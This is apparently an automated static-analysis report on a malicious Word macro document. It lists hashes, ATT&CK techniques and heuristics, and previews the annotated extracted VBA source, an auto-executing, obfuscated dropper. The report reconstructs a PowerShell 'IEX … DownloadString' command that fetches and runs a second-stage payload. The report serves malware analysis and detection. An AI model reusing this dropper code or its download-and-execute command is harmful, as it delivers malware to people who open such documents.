Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a6115b50b8ee2c8d…

MALICIOUS

Office (OLE)

293.2 KB Created: 2018-07-11 15:29:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: 8ceb216ca1d150aba227dfb9af9cf169 SHA-1: 17e1e19a727e07607b000b3f5f88ff5ff87dc6a8 SHA-256: a6115b50b8ee2c8da1c6503f15a6f7bb75d6e91c1dd2275f54d9bd39ea36dd6a
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open auto-execution routine. This macro uses the Shell() function to execute a PowerShell command. The reconstructed PowerShell command is 'IEX (New-Object Net.WebClient).DownloadString('the embedded link')', which indicates it downloads and executes a second-stage payload from that URL. This is a common technique for malware droppers.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    Note that the only URL extracted here is the standard OOXML DrawingML schema namespace found in the document body; the second-stage download URL referenced by the macro is not among the extracted URLs.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29011 bytes
SHA-256: 19b6e575774d85ed3748f8b7d59360f188e302fd4966d03c35cc02e1faa43f71
Preview script
First 1,000 lines of the extracted script
' Module metadata emitted by the VBA extractor. VB_Base = "1Normal.ThisDocument" marks this as the
' document's ThisDocument module (the module whose Document_open handler fires on open); the
' randomised VB_Name is consistent with the generated/obfuscated naming used throughout the sample.
Attribute VB_Name = "XVIscwPw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: runs when the document is opened (heuristic OLE_VBA_DOCOPEN,
' ATT&CK T1204.002). Analyst annotations only; the extracted code is left byte-identical.
Private Sub Document_open()
' Suppresses runtime errors so that the arithmetic on undeclared variables below does not
' abort the handler before the Application.Run line executes.
On Error Resume Next
   ' Arithmetic on undeclared variables whose results are never read — appears to be
   ' padding/obfuscation with no effect on behaviour (to be confirmed by dynamic analysis).
   AzOCb = 96293 - dqHqj * (20052 * jvUbFN * (97641 / QCGtAc * EDwXzJ - ljwsq))
   DsJMod = 20205 - iNWsAF * (30445 * FlQsY * (27765 / LilUZ * OuFPqI - qabiis))
' The one effective statement: invokes the procedure named "UnncIvYPIsh" via Application.Run,
' passing a single string assembled by concatenating the listed names. At least two of them
' (iXlvOMqaBRt, BjwzUkJqX) are functions defined in the second module below that return string
' fragments; "UnncIvYPIsh" itself is not in the visible preview, so what it does with the
' argument cannot be confirmed from this listing.
wrYsz = Application.Run("UnncIvYPIsh", "" + mznPLsjp + TXiLvizl + iXlvOMqaBRt + BjwzUkJqX + pjhKP + tvTLpbPP + nzcUfk + mHpASCNP + RwsJuCF + pSsMz + mdVNzwpjkOC + BibUQVNUM + bWdwncMUwMoaz + JlBQSQd)
   ' More dead arithmetic (same pattern as above).
   bfnSHD = 59768 - fMjdBY * (75653 * INoJvz * (10789 / KCcnj * cziqRM - HpnPSt))
   VRfKiK = 61372 - zWDOq * (56676 * likQdT * (37972 / sYZzru * ZzMja - zCmnj))
   CZwKQd = 51229 - biiZlH * (9491 * rDikjv * (21864 / aABXB * dDUWHd - dPTBFG))
End Sub


' Second module in the extracted source; holds the string-building functions referenced
' by Document_open's Application.Run argument.
Attribute VB_Name = "nwzkMYOLAvHOp"
' Returns one fragment of the string that Document_open hands to Application.Run. The literal
' pieces are split into short substrings and interleaved with undeclared (empty) variables and
' dead arithmetic so that no single line contains a recognisable keyword.
Function iXlvOMqaBRt()
' Undeclared variables and division by empty values would otherwise raise; errors are swallowed.
On Error Resume Next
' Dead arithmetic — results never read.
QQjbH = nYUUwl / nEctdq - HRjKSm - 77250
   MdRcD = (lGsPMS - WUSBmk - 85857 - JJfFci / 46099 + bfkLFj - wjpzww / jlblG) + XrVSY + DTmXb
' Literal fragments "PowE" + "Rs" + "hEL" + "L   " spell "PowERshELL   " once the interleaved
' empty variables drop out; Chr(34) is a double-quote character. This is the only line in the
' visible preview that names the interpreter the report attributes the execution to.
zkJEBZbuNP = "" + INzkhowK + SrDWYjdd + "PowE" + sukXGwhZJUoHw + jlJGQjjI + "Rs" + PONmlIKh + OdcijHXAz + "hEL" + vvKpvUXi + lDNrkTmY + "L   " + aLowFJfWJIi + wUSCzqom + Chr(34) + "('" + JdaOnwnkcnr + HMjloAZBbbrO + "36,"
RphXq = (52902 / fUfurY * 41993 + 46080 - (11217 * UOkLq + 26820 + zmZYi))
' The remaining literal fragments ("69Z", "75", "Q11", "1,6", "9C45", ...) look like an encoded
' payload rather than plain text; the decoding routine is not in the visible preview, so the
' decoded content is only known from the report's reconstructed command — confirm dynamically.
ahhkZBLzBz = "" + QhWvuQBJwcrDrz + dVGWAmG + "69Z" + dXECLzTwvbq + LETEljzKNCJ + "75" + MuMzdbvUQtwGnf + vVlEBKCD + "Q11"
DcEUD = (73 / CZWuz * 42501 + 99823 - (47300 * AtPqj + 95216 + SzNzo))
   WaRQV = (89639 / QkYkwz * 29371 + 7062 - (15684 * LWwwEb + 6568 + jXRtB))
YnnIKHlzn = "" + ijbsUKiEun + bJbhRIAQAl + "1,6" + FamVpAjfJzL + HEMRoVCMZaIYji + "1Q11" + zWwiAmuYNP + oOczInJ + "0,10" + wLQzPjzdzJRCJ + PpuUJnEYbwX + "1i11" + LPtYchAKjfkFvv + cBfEziS + "9C45" + tBunoArWARhPt + JRiKJPOsoSz + "l1" + FwcwAjijFXrit + diqiaDuizIjafI + "11" + pCzQBpkPJr + urfPfTO + "C98d" + QWoLQdoQJDX + CcuSsow + "106"
zLdvjN = cCaYu * lzTZwj / Tuqhsd / JrkDkz / 91974 * fLHmz - 38048 * 96579
   jHqoI = UuLuBs * jKElM / zAoYEq / DVNbaG / 3765 * nhVcUL - 92873 * 29579
kVDcX = "" + swkfBlziG + UvDFiwk + "s10" + ozmiRHRMjQ + PPAfzdqwFCqmE + "1Z99" + EjVVNmDiv + NtUlBqo + ",116" + jDaiUuT + HAaGrNfKvHEL + "Z32" + TtQwiTA + sFjBFrBSSlsnLf + ",78" + GFrujGu + HkEwowlHCiBILa + "s101"
' Return value: the four fragment strings above concatenated in order (again padded with
' empty variables).
iXlvOMqaBRt = "" + pmasRHOItXNIFS + nDwGzUim + zkJEBZbuNP + JzGtufXBrUT + zWvEQldCjwqU + ahhkZBLzBz + MvUHnmkwRCA + lDbQqkWwkCQN + YnnIKHlzn + dZAPZmDLFWM + wAFsEnDrw + kVDcX
   ' Trailing dead arithmetic after the return value is set.
   GpbpGd = YRAEco * Mfzks / nYbIv / lrErm / 74276 * QOkWpD - 65633 * 56322
   zjmdct = umJGZ * maria / EDKUZz / JLZwlf / 32261 * QpzZi - 22619 * 34730
End Function
Function BjwzUkJqX()
On Error Resume Next
Mrbanu = bZzGhN * tjsFT / ORrYAb / HhKrN / 9465 * vEvKEK - 13077 * 21292
WtVAnGFFFv = "" + jWCwTpYG + vADaLkduO + "s1" + dQXpnhAJTDEDN + GKNUTHL + "16" + DsksadQ + SDGfHfHXzaNr + "l46l" + GGdSjumkRkXlv + ipmFVvQw + "87" + hMwKlSJ + dmwLkEv + "s10" + VIVkKOOkblbu + COzhqafR + "1i9" + tTVmiBBaOid + zChwBrXiIniu + "8Z6" + XEGGDtqrqtbG + BjMiihCiJiia + "7d10" + ljrrhQi + XZZqGLoU + "8C1" + ncbaAMPjs + bcDpGKBkZIF + "05Z" + oEIqvTUJjJ + JFrfRhmZfw + "101s"
BzBmk = IiwDm * DYnZaS / TAQwFK / HaSGt / 84419 * movSi - 48027 * 27358
djofHU = "" + GSvctuNwMFd + DvbjOhPqJunQ + "110Q" + HstdTjnqmPbOj + hmiQCsWH + "116C" + SEmwYILIDGGScJ + MJMEABJibHIAhw + "59O3" + BdBcBuOGQFcz + KVaFjMuow + "6O7" + DUQzKbFVVQwINw + FnvZKiMzmacRYq + "9Z8" + khzZzGFdXii + NMJORpAD + "1Q7" + VISNkznwfETX + szwiRBfDOlZNTC + "0i6" + LbtzcRi + ikhwtspjKW + "1i" + SlpESthnXjkpf + iiVaSENnRwEUs + "39i1" + IjnJtpDsKXz + wzrTBzLwpvAlEw + "04," + NZoDqYE + wDbpLDVwQp + "116l"
wJMwC = FNwJP * RmQzn / osHlBh / oUqMX / 96410 * caBtj - 77331 * 9786
   lStYi = kmYpq * mzzICG / vpwCwk / isfmo / 17657 * wcGvf - 16165 * 10003
iiZSDzTjb = "" + qitkhpqwr + bHLIiYOtO + "11" + LuurlXNzVY + uWnnGfAOfQEAS + "6d11" + EPqXYQRSzqqE + sMrWSQlrlINO + "2s" + vqtYvmJjfBjYdE + QajdnDMiAYzNih 
... (truncated)